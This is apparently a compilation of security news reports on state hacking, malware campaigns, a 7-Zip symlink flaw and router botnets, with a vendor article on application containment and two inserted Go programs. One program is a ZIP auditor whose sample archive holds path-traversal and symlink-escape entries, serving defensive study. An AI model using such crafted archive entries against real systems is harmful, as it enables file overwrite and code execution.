Threat actors with ties to Iran engaged in cyber warfare as part of efforts to facilitate and enhance physical, real-world attacks, a trend that Amazon has called cyber-enabled kinetic targeting. The development is a sign that the lines between state-sponsored cyber attacks and kinetic warfare are increasingly blurring, necessitating a new category of warfare, the tech giant’s threat intelligence team said in a report shared with The Hacker News. While traditional cybersecurity frameworks have treated digital and physical threats as separate domains, CJ Moses, CISO of Amazon Integrated Security, said these delineations are artificial and that nation-state threat actors are engaging in cyber reconnaissance activity to enable kinetic targeting. “These aren’t just cyber attacks that happen to cause physical damage; they are coordinated campaigns where digital operations are specifically designed to support physical military objectives,” Moses added.

As an example, Amazon said it observed Imperial Kitten (aka Tortoiseshell), a hacking group assessed to be affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), conducting digital reconnaissance between December 2021 and January 2024, targeting a ship’s Automatic Identification System (AIS) platform with the goal of gaining access to critical shipping infrastructure. Subsequently, the threat actor was identified as attacking additional maritime vessel platforms, in one case even gaining access to CCTV cameras fitted on a maritime vessel that provided real-time visual intelligence. The attack progressed to a targeted intelligence gathering phase on January 27, 2024, when Imperial Kitten carried out targeted searches for AIS location data for a specific shipping vessel. Merely days later, that same vessel was targeted by an unsuccessful missile strike carried out by Iranian-backed Houthi militants.

A string of missile attacks targeting commercial shipping in the Red Sea, carried out in support of the Palestinian militant group Hamas in its war with Israel, has been attributed to the Houthi forces. On February 1, 2024, the Houthi movement in Yemen claimed it had struck a U.S. merchant ship named KOI with “several appropriate naval missiles.” “This case demonstrates how cyber operations can provide adversaries with the precise intelligence needed to conduct targeted physical attacks against maritime infrastructure – a critical component of global commerce and military logistics,” Moses said. Another case study concerns MuddyWater, a threat actor linked to Iran’s Ministry of Intelligence and Security (MOIS), that established infrastructure for a cyber network operation in May 2025 and, a month later, used that server to access another compromised server containing live CCTV streams from Jerusalem to gather real-time visual intelligence of potential targets.

On June 23, 2025, around the time Iran launched widespread missile attacks against the city, the Israel National Cyber Directorate disclosed that “Iranians have been trying to connect to cameras to understand what happened and where their missiles hit to improve their precision.” To pull off these multi-layered attacks, the threat actors are said to have routed their traffic through anonymizing VPN services to obscure their true origins and complicate attribution efforts. The findings serve to highlight that espionage-focused attacks can ultimately be a launchpad for kinetic targeting. “Nation-state actors are recognizing the force multiplier effect of combining digital reconnaissance with physical attacks,” Amazon said. “This trend represents a fundamental evolution in warfare, where the traditional boundaries between cyber and kinetic operations are dissolving.”


TamperedChef Malware Spreads via Fake Software Installers in Ongoing Global Campaign

Threat actors are leveraging bogus installers masquerading as popular software to trick users into installing malware as part of a global malvertising campaign dubbed TamperedChef. The end goal of the attacks is to establish persistence and deliver JavaScript malware that facilitates remote access and control, per a new report from Acronis Threat Research Unit (TRU). The campaign, per the Singapore-headquartered company, is still ongoing, with new artifacts being detected and associated infrastructure remaining active. “The operator(s) rely on social engineering by using everyday application names, malvertising, Search Engine Optimization (SEO), and abused digital certificates that aim to increase user trust and evade security detection,” researchers Darrel Virtusio and Jozsef Gegeny said.

TamperedChef is the name assigned to a long-running campaign that has leveraged seemingly legitimate installers for various utilities to distribute an information stealer malware of the same name. It’s assessed to be part of a broader set of attacks codenamed EvilAI that uses lures related to artificial intelligence (AI) tools and software for malware propagation. To lend these counterfeit apps a veneer of legitimacy, the attackers use code-signing certificates issued for shell companies registered in the U.S., Panama, and Malaysia to sign them, and acquire new ones under a different company name as older certificates are revoked. Acronis described the infrastructure as “industrialized and business-like,” effectively allowing the operators to steadily churn out new certificates and exploit the inherent trust associated with signed applications to disguise the malicious software as legitimate.

It’s worth noting at this stage that the malware tracked as TamperedChef by Truesec and G DATA is also referred to as BaoLoader by Expel, and is different from the original TamperedChef malware that was embedded within a malicious recipe application distributed as part of the EvilAI campaign. Acronis told The Hacker News that it’s using TamperedChef to refer to the malware family, since it has already been widely adopted by the cybersecurity community. “This helps avoid confusion and stay consistent with existing publications and detection names used by other vendors, which also refer to the malware family as TamperedChef,” it said. A typical attack plays out as follows: Users who search for PDF editors or product manuals on search engines like Bing are served malicious ads or poisoned URLs that, when clicked, take them to booby-trapped domains registered on NameCheap that deceive them into downloading the installers.

Once the installer is executed, users are prompted to agree to the program’s licensing terms. It then launches a new browser tab to display a thank-you message as soon as the installation is complete in order to keep up the ruse. However, in the background, an XML file is dropped to create a scheduled task that’s designed to launch an obfuscated JavaScript backdoor. The backdoor, in turn, connects to an external server and sends basic information, such as session ID, machine ID, and other metadata, in the form of a JSON string that’s encrypted and Base64-encoded over HTTPS.

That being said, the end goals of the campaign remain nebulous. Some iterations have been found to facilitate advertising fraud, indicating their financial motives. It’s also possible that the threat actors are looking to monetize their access to other cybercriminals, or harvest sensitive data and sell it in underground forums to enable fraud. Telemetry data shows that a significant concentration of infections has been identified in the U.S., and to a lesser extent in Israel, Spain, Germany, India, and Ireland.

Healthcare, construction, and manufacturing are the most affected sectors. “These industries appear especially vulnerable to this type of campaign, likely due to their reliance on highly specialized and technical equipment, which often prompts users to search online for product manuals – one of the behaviors exploited by the TamperedChef campaign,” the researchers noted.

Hackers Actively Exploiting 7-Zip Symbolic Link–Based RCE Vulnerability (CVE-2025-11001)

A recently disclosed security flaw impacting 7-Zip has come under active exploitation in the wild, according to an advisory issued by the U.K. NHS England Digital on Tuesday. The vulnerability in question is CVE-2025-11001 (CVSS score: 7.0), which allows remote attackers to execute arbitrary code. It has been addressed in 7-Zip version 25.00 released in July 2025.

“The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories,” Trend Micro’s Zero Day Initiative (ZDI) said in an alert released last month. “An attacker can leverage this vulnerability to execute code in the context of a service account.” Ryota Shiga of GMO Flatt Security Inc., along with the company’s artificial intelligence (AI)-powered AppSec Auditor Takumi, has been credited with discovering and reporting the vulnerability. It’s worth noting that 7-Zip 25.00 also resolves another flaw, CVE-2025-11002 (CVSS score: 7.0), that allows for remote code execution by taking advantage of improper handling of symbolic links within ZIP archives, resulting in directory traversal.

Both shortcomings were introduced in version 21.02. “Active exploitation of CVE-2025-11001 has been observed in the wild,” NHS England Digital said. However, there are currently no details available on how it’s being weaponized, by whom, and in what context. Given that proof-of-concept (PoC) exploits exist, 7-Zip users who have not already done so should apply the fix as soon as possible.

“This vulnerability can only be exploited from the context of an elevated user / service account or a machine with developer mode enabled,” security researcher Dominik (aka pacbypass), who released the PoC, said in a post detailing the flaw. “This vulnerability can only be exploited on Windows.”
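A pre-extraction audit in the spirit of the ZDI description above, added here as an example and not 7-Zip's own code or the published PoC: it walks the archive's central directory without writing to disk and flags entry names and symlink targets that resolve outside the extraction root, plus files whose path passes through an earlier symlink entry. The sample archive is constructed in memory; the exact CVE-2025-11001 trigger is not reproduced.

```go
package main

import (
	"archive/zip"
	"bytes"
	"errors"
	"fmt"
	"io"
	"os"
	"path"
	"regexp"
	"strings"
)

// Finding is one archive entry that a safe extractor should refuse or review.
type Finding struct {
	Entry  string
	Target string // symlink target, when the entry is a symlink
	Reason string
}

var driveLetter = regexp.MustCompile(`^[A-Za-z]:`)

// normalize converts backslash names (common in Windows-built archives) to slashes.
func normalize(p string) string {
	return strings.ReplaceAll(strings.TrimSpace(p), `\`, "/")
}

// isAbsolute catches POSIX roots and Windows drive-letter prefixes.
func isAbsolute(p string) bool {
	return strings.HasPrefix(p, "/") || driveLetter.MatchString(p)
}

// escapesRoot reports whether a slash-separated relative path climbs above the root.
func escapesRoot(p string) bool {
	c := path.Clean(p)
	return c == ".." || strings.HasPrefix(c, "../")
}

// AuditZip inspects every entry without extracting. It flags (1) names that resolve
// outside the root, (2) symlink targets that are absolute or resolve outside the root,
// and (3) entries whose path passes through an earlier symlink entry, which an
// extractor that follows links would write wherever that link points.
func AuditZip(data []byte) ([]Finding, error) {
	zr, err := zip.NewReader(bytes.NewReader(data), int64(len(data)))
	// Go's reader may itself report non-local names (GODEBUG zipinsecurepath) while
	// still returning a usable reader; we want to list those names ourselves.
	if err != nil && !errors.Is(err, zip.ErrInsecurePath) {
		return nil, err
	}
	var findings []Finding
	links := map[string]bool{} // cleaned names of symlink entries seen so far
	for _, f := range zr.File {
		name := normalize(f.Name)
		if isAbsolute(name) || escapesRoot(name) {
			findings = append(findings, Finding{Entry: f.Name, Reason: "entry name escapes extraction root"})
			continue
		}
		clean := path.Clean(name)
		for dir := path.Dir(clean); dir != "." && dir != "/"; dir = path.Dir(dir) {
			if links[dir] {
				findings = append(findings, Finding{Entry: f.Name, Reason: "path passes through symlink entry " + dir})
				break
			}
		}
		if f.FileInfo().Mode()&os.ModeSymlink == 0 {
			continue
		}
		rc, err := f.Open()
		if err != nil {
			return nil, err
		}
		raw, err := io.ReadAll(io.LimitReader(rc, 4096)) // link targets are short; cap the read
		rc.Close()
		if err != nil {
			return nil, err
		}
		target := normalize(string(raw))
		links[clean] = true
		switch {
		case isAbsolute(target):
			findings = append(findings, Finding{Entry: f.Name, Target: target, Reason: "symlink target is absolute"})
		case escapesRoot(path.Join(path.Dir(clean), target)):
			findings = append(findings, Finding{Entry: f.Name, Target: target, Reason: "symlink target resolves outside extraction root"})
		}
	}
	return findings, nil
}

// BuildSampleZip constructs an in-memory archive (sample data, not a real capture)
// mixing benign entries with the patterns AuditZip is meant to catch.
func BuildSampleZip() []byte {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	add := func(name, content string, symlink bool) {
		hdr := &zip.FileHeader{Name: name, Method: zip.Store}
		if symlink {
			hdr.SetMode(os.ModeSymlink | 0o777) // Unix S_IFLNK in the external attributes
		} else {
			hdr.SetMode(0o644)
		}
		w, err := zw.CreateHeader(hdr)
		if err != nil {
			panic(err)
		}
		if _, err := w.Write([]byte(content)); err != nil {
			panic(err)
		}
	}
	add("docs/readme.txt", "hello", false)                  // benign file
	add("safe/ln", "../docs/readme.txt", true)              // benign link, stays inside the root
	add("docs/link", "../../outside", true)                 // link climbing above the root
	add("docs/link/payload.txt", "through the link", false) // file written via that link
	add("abs", "/srv/target", true)                         // absolute link target
	add("../evil.txt", "zip slip", false)                   // classic name traversal
	if err := zw.Close(); err != nil {
		panic(err)
	}
	return buf.Bytes()
}

func main() {
	findings, err := AuditZip(BuildSampleZip())
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	for _, f := range findings {
		fmt.Printf("%-24s %-20s %s\n", f.Entry, f.Target, f.Reason)
	}
}
```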

Python-Based WhatsApp Worm Spreads Eternidade Stealer Across Brazilian Devices

Cybersecurity researchers have disclosed details of a new campaign that leverages a combination of social engineering and WhatsApp hijacking to distribute a Delphi-based banking trojan named Eternidade Stealer as part of attacks targeting users in Brazil. “It uses Internet Message Access Protocol (IMAP) to dynamically retrieve command-and-control (C2) addresses, allowing the threat actor to update its C2 server,” Trustwave SpiderLabs researchers Nathaniel Morales, John Basmayor, and Nikita Kazymirskyi said in a technical breakdown of the campaign shared with The Hacker News. “It is distributed through a WhatsApp worm campaign, with the actor now deploying a Python script, a shift from previous PowerShell-based scripts to hijack WhatsApp and spread malicious attachments.” The findings come close on the heels of another campaign dubbed Water Saci that has targeted Brazilian users with a worm that propagates via WhatsApp Web known as SORVEPOTEL, which then acts as a conduit for Maverick, a .NET banking trojan that’s assessed to be an evolution of a .NET banking malware dubbed Coyote.

The Eternidade Stealer cluster is part of a broader activity that has abused the ubiquity of WhatsApp in the South American country to compromise target systems and use the messaging app as a propagation vector to launch large-scale attacks against Brazilian institutions. Another notable trend is the continued preference for Delphi-based malware among threat actors targeting Latin America, driven not only by its technical efficiency but also by the fact that the programming language was taught and used in software development in the region. The starting point of the attack is an obfuscated Visual Basic Script, which features comments written mainly in Portuguese. The script, once executed, drops a batch script that’s responsible for delivering two payloads, effectively forking the infection chain into two -
- A Python script that triggers WhatsApp Web-based dissemination of the malware in a worm-like fashion
- An MSI installer that makes use of an AutoIt script to launch Eternidade Stealer

The Python script, similar to SORVEPOTEL, establishes communication with a remote server and leverages the open-source project WPPConnect to automate the sending of messages from hijacked accounts via WhatsApp.

To do this, it harvests a victim’s entire contact list, while filtering out groups, business contacts, and broadcast lists. The malware then proceeds to capture, for each contact, their WhatsApp phone number, name, and information signaling whether they are a saved contact. This information is sent to the attacker-controlled server over an HTTP POST request. In the final stage, a malicious attachment is sent to all the contacts by making use of a messaging template and populating certain fields with time-based greetings and contact names.

The second leg of the attack commences with the MSI installer dropping several payloads, including an AutoIt script that checks to see if the compromised system is based in Brazil by inspecting whether the operating system language is Brazilian Portuguese. If not, the malware self-terminates. This indicates a hyper-localized targeting effort on the part of the threat actors. The script subsequently scans running processes and registry keys to ascertain the presence of installed security products.

It also profiles the machine and sends the details to a command-and-control (C2) server. The attack culminates with the malware injecting the Eternidade Stealer payload into “svchost.exe” using process hollowing. A Delphi-based credential stealer, Eternidade continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets, such as Bradesco, BTG Pactual, MercadoPago, Stripe, Binance, Coinbase, MetaMask, and Trust Wallet, among others. “Such a behavior reflects a classic banker or overlay-stealer tactic, where malicious components lie dormant until the victim opens a targeted banking or wallet application, ensuring the attack triggers only in relevant contexts and remains invisible to casual users or sandbox environments,” the researchers said.

Once a match is found, it contacts a C2 server, details for which are fetched from an inbox linked to a terra.com[.]br email address, mirroring a tactic recently adopted by Water Saci. This allows the threat actors to update their C2, maintain persistence, and evade detections or takedowns. In the event that the malware is unable to connect to the email account using hard-coded credentials, it uses a fallback C2 address embedded in the source code. As soon as a successful connection with the server is established, the malware awaits incoming messages that are then processed and executed on the infected hosts, enabling the attackers to record keystrokes, capture screenshots, and steal files.

Some of the notable commands are listed below -
- <|OK|>, to collect system information
- <|PING|>, to monitor user activity and report the currently active window
- <|PedidoSenhas|>, to send a custom overlay for credential theft based on the active window

Trustwave said an analysis of threat actor infrastructure led to the discovery of two panels, one for managing the Redirector System and another login panel, likely used to monitor infected hosts. The Redirector System contains logs showing the total number of visits and blocks for connections attempting to reach the C2 address. While the system only permits access to machines located in Brazil and Argentina, blocked connections are redirected to “google[.]com/error.” Statistics recorded on the panel show that 452 out of 454 visits were blocked due to the geofencing restrictions. Only the remaining two visits are said to have been redirected to the campaign’s targeted domain.

Of the 454 communication records, 196 connections originated from the U.S., followed by the Netherlands (37), Germany (32), the U.K. (23), France (19), and Brazil (3). The Windows operating system accounted for 115 connections, although panel data indicates that connections also came from macOS (94), Linux (45), and Android (18). Despite the high degree of similarity with Water Saci, Trustwave told The Hacker News there is no evidence to suggest the underlying infrastructure is being shared or sold as a service.

It also added that the presence of unique artifacts written in Python (as opposed to PowerShell in the case of Water Saci) indicates this is “either a small team or one person with Copilot.” “Although the malware family and delivery vectors are primarily Brazilian, the possible operational footprint and victim exposure are far more global,” Trustwave said. “Cybersecurity defenders should remain vigilant for suspicious WhatsApp activity, unexpected MSI or script executions, and indicators linked to this ongoing campaign.”

WrtHug Exploits Six ASUS WRT Flaws to Hijack Tens of Thousands of EoL Routers Worldwide

A newly discovered campaign has compromised tens of thousands of outdated or end-of-life (EoL) ASUS routers worldwide, predominantly in Taiwan, the U.S., and Russia, to rope them into a massive network. The router hijacking activity has been codenamed Operation WrtHug by SecurityScorecard’s STRIKE team. Southeast Asia and European countries are some of the other regions where infections have been recorded. Over the past six months, more than 50,000 unique IP addresses belonging to these compromised devices around the globe have been identified.

The attacks likely involve the exploitation of six known security flaws in end-of-life ASUS WRT routers to take control of susceptible devices. All the infected routers have been found to share a unique self-signed TLS certificate with an expiration date set for 100 years from April 2022. SecurityScorecard said 99% of the services presenting the certificate are ASUS AiCloud, a proprietary service designed to enable access to local storage via the internet. “It leverages the proprietary AiCloud service with n-day vulnerabilities in order to gain high privileges on End-Of-Life ASUS WRT routers,” the company said in a report shared with The Hacker News, adding the campaign, while not exactly an Operational Relay Box (ORB), bears similarities with other China-linked ORBs and botnet networks.

The attacks likely exploit vulnerabilities tracked as CVE-2023-41345, CVE-2023-41346, CVE-2023-41347, CVE-2023-41348, CVE-2023-39780, CVE-2024-12912, and CVE-2025-2492 for proliferation. Interestingly, the exploitation of CVE-2023-39780 has also been linked to another Chinese-origin botnet dubbed AyySSHush (aka ViciousTrap). Two other ORBs that have targeted routers in recent months are LapDogs and PolarEdge. Out of all the infected devices, seven IP addresses have been flagged for exhibiting signs of compromise associated with both WrtHug and AyySSHush, potentially raising the possibility that the two clusters could be related.

That being said, there is no evidence to back this hypothesis beyond the shared vulnerability. The list of router models targeted in the attacks is below -
- ASUS Wireless Router 4G-AC55U
- ASUS Wireless Router 4G-AC860U
- ASUS Wireless Router DSL-AC68U
- ASUS Wireless Router GT-AC5300
- ASUS Wireless Router GT-AX11000
- ASUS Wireless Router RT-AC1200HP
- ASUS Wireless Router RT-AC1300GPLUS
- ASUS Wireless Router RT-AC1300UHP

It’s currently not clear who is behind the operation, but the extensive targeting of Taiwan and overlaps with previous tactics observed in ORB campaigns from Chinese hacking groups suggest it could be the work of an unknown China-affiliated actor. “This research highlights the growing trend of malicious threat actors targeting routers and other network devices in mass infection operations,” SecurityScorecard said. “These are commonly (but not exclusively) linked to China Nexus actors, who execute their campaigns in a careful and calculated manner to expand and deepen their global reach.” “By chaining command injections and authentication bypasses, threat actors have managed to deploy persistent backdoors via SSH, often abusing legitimate router features to ensure their presence survives reboots or firmware updates.”
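A fleet check for the certificate trait reported above (a shared self-signed certificate valid for 100 years from April 2022), added here as an example rather than SecurityScorecard's tooling: it parses a DER certificate and flags self-signed certificates whose validity spans decades. The 10-year threshold, the sample-router name and the in-memory certificates are assumptions; the campaign's real certificate is not reproduced.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// Verdict is the result of assessing one certificate.
type Verdict struct {
	SelfSigned    bool
	ValidityYears float64
	Suspicious    bool
	Reason        string
}

// MaxSaneValidityYears is an assumed threshold: publicly trusted leaf certificates are
// limited to about 13 months, and even internal CAs rarely issue beyond a decade.
const MaxSaneValidityYears = 10.0

// AssessCert parses a DER-encoded certificate and flags the reported combination:
// self-signed (issuer equals subject and the signature verifies with the certificate's
// own public key) with a validity period measured in decades.
func AssessCert(der []byte) (Verdict, error) {
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		return Verdict{}, err
	}
	var v Verdict
	sigOK := cert.CheckSignature(cert.SignatureAlgorithm, cert.RawTBSCertificate, cert.Signature) == nil
	v.SelfSigned = sigOK && bytes.Equal(cert.RawSubject, cert.RawIssuer)
	v.ValidityYears = cert.NotAfter.Sub(cert.NotBefore).Hours() / (24 * 365.25)
	switch {
	case v.SelfSigned && v.ValidityYears > MaxSaneValidityYears:
		v.Suspicious = true
		v.Reason = fmt.Sprintf("self-signed, valid for %.1f years (%s to %s)", v.ValidityYears,
			cert.NotBefore.Format("2006-01"), cert.NotAfter.Format("2006-01"))
	case v.SelfSigned:
		v.Reason = "self-signed with ordinary validity"
	default:
		v.Reason = "issued by a different subject"
	}
	return v, nil
}

// newSelfSigned builds a throwaway self-signed certificate (constructed sample data,
// not a capture from any router) covering the given validity window.
func newSelfSigned(notBefore, notAfter time.Time) []byte {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: "sample-router"}, // assumed name
		NotBefore:    notBefore,
		NotAfter:     notAfter,
		KeyUsage:     x509.KeyUsageDigitalSignature,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		panic(err)
	}
	return der
}

// SampleLongLivedCert mimics the reported trait: 100-year validity starting April 2022.
func SampleLongLivedCert() []byte {
	start := time.Date(2022, time.April, 1, 0, 0, 0, 0, time.UTC)
	return newSelfSigned(start, start.AddDate(100, 0, 0))
}

// SampleShortLivedCert is an ordinary one-year self-signed certificate for comparison.
func SampleShortLivedCert() []byte {
	start := time.Date(2022, time.April, 1, 0, 0, 0, 0, time.UTC)
	return newSelfSigned(start, start.AddDate(1, 0, 0))
}

func main() {
	for _, der := range [][]byte{SampleLongLivedCert(), SampleShortLivedCert()} {
		v, err := AssessCert(der)
		if err != nil {
			fmt.Println("parse error:", err)
			continue
		}
		fmt.Printf("suspicious=%-5t %s\n", v.Suspicious, v.Reason)
	}
}
```

For a live device, the DER bytes come from the peer certificate of a tls.Conn (ConnectionState().PeerCertificates[0].Raw), dialed with verification disabled because the certificate is self-signed by design.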


Application Containment: How to Use Ringfencing to Prevent the Weaponization of Trusted Software

The challenge facing security leaders is monumental: Securing environments where failure is not an option. Reliance on traditional security postures, such as Endpoint Detection and Response (EDR) to chase threats after they have already entered the network, is fundamentally risky and contributes significantly to the half-trillion-dollar annual cost of cybercrime. Zero Trust fundamentally shifts this approach, transitioning from reacting to symptoms to proactively solving the underlying problem. Application Control, the ability to rigorously define what software is allowed to execute, is the foundation of this strategy.

However, even once an application is trusted, it can be misused. This is where ThreatLocker Ringfencing™, or granular application containment, becomes indispensable, enforcing the ultimate standard of least privilege on all authorized applications.

Defining Ringfencing: Security Beyond Allowlisting

Ringfencing is an advanced containment strategy applied to applications that have already been approved to run. While allowlisting ensures a fundamental deny-by-default posture for all unknown software, Ringfencing further restricts the capabilities of the permitted software. It operates by dictating precisely what an application can access, including files, registry keys, network resources, and other applications or processes. This granular control is vital because threat actors frequently bypass security controls by misusing legitimate, approved software, a technique commonly referred to as “living off the land.” Uncontained applications, such as productivity suites or scripting tools, can be weaponized to spawn risky child processes (like PowerShell or Command Prompt) or communicate with unauthorized external servers.

The Security Imperative: Stopping Overreach

Without effective containment, security teams leave wide open attack vectors that lead directly to high-impact incidents.
- Mitigating Lateral Movement: Ringfencing isolates application behaviors, hindering the ability of compromised processes to move across the network. Policies can be set to restrict outbound network traffic, a measure that would have foiled major attacks that relied on servers reaching out to malicious endpoints for instructions.
- Containing High-Risk Applications: A critical use case is reducing the risk associated with legacy files or scripts, such as Office macros. By applying containment, applications like Word or Excel, even if required by departments like Finance, are restricted from launching high-risk script engines like PowerShell or accessing high-risk directories.
- Preventing Data Exfiltration and Encryption: Containment policies can limit an application’s ability to read or write to sensitive monitored paths (such as document folders or backup directories), effectively blocking mass data exfiltration attempts and preventing ransomware from encrypting files outside its designated scope.

Ringfencing inherently supports compliance goals by ensuring that all applications operate strictly with the permissions they truly require, aligning security efforts with best-practice standards such as CIS Controls.

Mechanics: How Granular Containment Works

Ringfencing policies provide comprehensive control over multiple vectors of application behavior, functioning as a second layer of defense after execution is permitted. A policy dictates whether an application can access certain files and folders or make changes to the system registry. Most importantly, it governs Inter-Process Communication (IPC), ensuring an approved application cannot interact with or spawn unauthorized child processes. For instance, Ringfencing blocks Word from launching PowerShell or other unauthorized child processes.

Implementing Application Containment

Adopting Ringfencing requires a disciplined, phased implementation focused on avoiding operational disruption and political fallout.

Establishing the Baseline

Implementation starts by deploying a monitoring agent to establish visibility. The agent should be deployed first to a small test group or isolated test organization—often affectionately called the guinea pigs—to monitor activity. In this initial Learning Mode, the system logs all executions, elevations, and network activity without blocking anything.

Simulation and Enforcement

Before any policy is secured, the team should utilize the Unified Audit to run simulations (simulated denies). This preemptive auditing shows precisely what actions would be blocked if the new policy were enforced, allowing security professionals to make necessary exceptions upfront and prevent tanking the IT department’s approval rating. Ringfencing policies are then typically created and enforced first on applications recognized as high-risk, such as PowerShell, Command Prompt, Registry Editor, and 7-Zip, due to their high potential for weaponization. Teams should ensure that these policies have been properly tested before moving them to a secure, enforcing state.

Scaling and Refinement

Once policies are validated in the test environment, deployment is scaled gradually across the organization, typically starting with easy wins and moving slowly towards the hardest groups. Policies should be continuously reviewed and refined, including regularly removing unused policies to reduce administrative clutter.

Strategic Deployment and Best Practices

To maximize the benefits of application containment while minimizing user friction, leaders should adhere to proven strategies:
- Start Small and Phased: Always apply new Ringfencing policies to a non-critical test group first. Avoid solving all business problems at once; tackle highly dangerous software first (like Russian remote access tools), and delay political decisions (like blocking games) until later phases.
- Continuous Monitoring: Regularly review the Unified Audit and check for simulated denies before securing any policy to ensure legitimate functions are not broken.
- Combine Controls: Ringfencing is most effective when paired with Application Allowlisting (deny-by-default). It should also be combined with Storage Control to protect critical data and prevent mass data loss or exfiltration.
- Prioritize Configuration Checks: Utilize automated tools, like Defense Against Configurations (DAC), to verify that Ringfencing and other security measures are properly configured across all endpoints, highlighting where settings might have lapsed into monitor-only mode.

Outcomes and Organizational Gains

By implementing Ringfencing, organizations transition from a reactive model—where highly paid cybersecurity professionals spend time chasing alerts—to a proactive, hardened architecture. This approach offers significant value beyond just security:
- Operational Efficiency: Application control significantly reduces Security Operations Center (SOC) alerts—in some cases by up to 90%—resulting in less alert fatigue and substantial savings in time and resources.
- Enhanced Security: It stops the abuse of trusted programs, contains threats, and makes the cybercriminal’s life as difficult as possible.
- Business Value: It minimizes application overreach without breaking business-critical workflows, such as those required by the finance department for legacy macros.

Ultimately, Ringfencing strengthens the Zero Trust mindset, ensuring that every application, user, and device operates strictly within the boundaries of its necessary function, making detection and response truly a backup plan, rather than the primary defense. This article is a contributed piece from one of our valued partners.


EdgeStepper Implant Reroutes DNS Queries to Deploy Malware via Hijacked Software Updates

The threat actor known as PlushDaemon has been observed using a previously undocumented Go-based network backdoor codenamed EdgeStepper to facilitate adversary-in-the-middle (AitM) attacks. EdgeStepper “redirects all DNS queries to an external, malicious hijacking node, effectively rerouting the traffic from legitimate infrastructure used for software updates to attacker-controlled infrastructure,” ESET security researcher Facundo Muñoz said in a report shared with The Hacker News. Known to be active since at least 2018, PlushDaemon is assessed to be a China-aligned group that has attacked entities in the U.S., New Zealand, Cambodia, Hong Kong, Taiwan, South Korea, and mainland China. It was first documented by the Slovak cybersecurity company earlier this January, detailing a supply chain attack aimed at a South Korean virtual private network (VPN) provider named IPany to target a semiconductor company and an unidentified software development company in South Korea with a feature-rich implant dubbed SlowStepper.

The adversary’s victims include a university in Beijing, a Taiwanese company that manufactures electronics, a company in the automotive sector, and a branch of a Japanese company in the manufacturing sector. Earlier this month, ESET also said it observed PlushDaemon targeting two entities in Cambodia this year, a company in the automotive sector and a branch of a Japanese company in the manufacturing sector, with SlowStepper. The primary initial access mechanism for the threat actor is to leverage AitM poisoning, a technique that has been embraced by an “ever increasing” number of China-affiliated advanced persistent threat (APT) clusters in the last two years, such as LuoYu, Evasive Panda, BlackTech, TheWizards APT, Blackwood, and FontGoblin. ESET said it’s tracking ten active China-aligned groups that have hijacked software update mechanisms for initial access and lateral movement.

The attack essentially commences with the threat actor compromising an edge network device (e.g., a router) that its target is likely to connect to. This is accomplished by either exploiting a security flaw in the software or through weak credentials, allowing them to deploy EdgeStepper. “Then, EdgeStepper begins redirecting DNS queries to a malicious DNS node that verifies whether the domain in the DNS query message is related to software updates, and if so, it replies with the IP address of the hijacking node,” Muñoz explained. “Alternatively, we have also observed that some servers are both the DNS node and the hijacking node; in those cases, the DNS node replies to DNS queries with its own IP address.” Internally, the malware consists of two moving parts: a Distributor module that resolves the IP address associated with the DNS node domain (“test.dsc.wcsset[.]com”) and invokes the Ruler component responsible for configuring IP packet filter rules using iptables.

The attack specifically checks for several Chinese software products, including Sogou Pinyin, to have their update channels hijacked by means of EdgeStepper to deliver a malicious DLL (“popup_4.2.0.2246.dll” aka LittleDaemon) from a threat actor-controlled server. A first-stage payload deployed through hijacked updates, LittleDaemon is designed to communicate with the attacker node to fetch a downloader referred to as DaemonicLogistics if SlowStepper is not running on the infected system. The main purpose of DaemonicLogistics is to download the SlowStepper backdoor from the server and execute it. SlowStepper supports an extensive set of features to gather system information, files, and browser credentials, extract data from a number of messaging apps, and even uninstall itself.

“These implants give PlushDaemon the capability to compromise targets anywhere in the world,” Muñoz said.